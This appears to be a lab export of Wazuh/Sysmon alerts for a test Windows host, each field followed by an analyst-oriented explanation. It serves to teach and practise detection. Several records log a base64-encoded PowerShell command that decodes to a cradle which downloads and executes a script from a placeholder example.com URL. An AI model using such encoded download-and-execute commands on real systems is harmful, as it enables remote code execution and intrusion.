data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 122 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535347.2727295 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:55:45.3706619Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350393 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:55:45.357
ProcessGuid: {94294ddc-c170-680a-e10c-000000000e00}
ProcessId: 9224
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_2wwl0blf.ude.ps1
CreationUtcTime: 2025-04-24 22:55:45.355
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:55:45.357 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c170-680a-e10c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9224 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_2wwl0blf.ude.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:55:45.355 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 119 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535352.2730060 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:55:49.9714983Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350420 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:55:46.414
ProcessGuid: {94294ddc-c172-680a-e30c-000000000e00}
ProcessId: 8356
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c170-680a-e10c-000000000e00}
ParentProcessId: 9224
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:55:46.414 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c172-680a-e30c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8356 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-c170-680a-e10c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 9224 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 123 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535352.2738123 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:55:50.2371884Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350424 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:55:50.233
ProcessGuid: {94294ddc-c172-680a-e30c-000000000e00}
ProcessId: 8356
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_keqzo4et.k23.ps1
CreationUtcTime: 2025-04-24 22:55:50.233
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:55:50.233 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c172-680a-e30c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8356 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_keqzo4et.k23.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:55:50.233 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 120 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535356.2740888 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:55:54.0942354Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350473 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:55:52.709
ProcessGuid: {94294ddc-c178-680a-e60c-000000000e00}
ProcessId: 12424
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c172-680a-e30c-000000000e00}
ParentProcessId: 8356
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:55:52.709 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c178-680a-e60c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12424 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-c172-680a-e30c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 8356 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 124 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535356.2748955 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:55:55.0268034Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350477 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:55:54.983
ProcessGuid: {94294ddc-c178-680a-e60c-000000000e00}
ProcessId: 12424
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_mciyuvr4.sxa.ps1
CreationUtcTime: 2025-04-24 22:55:54.983
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:55:54.983 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
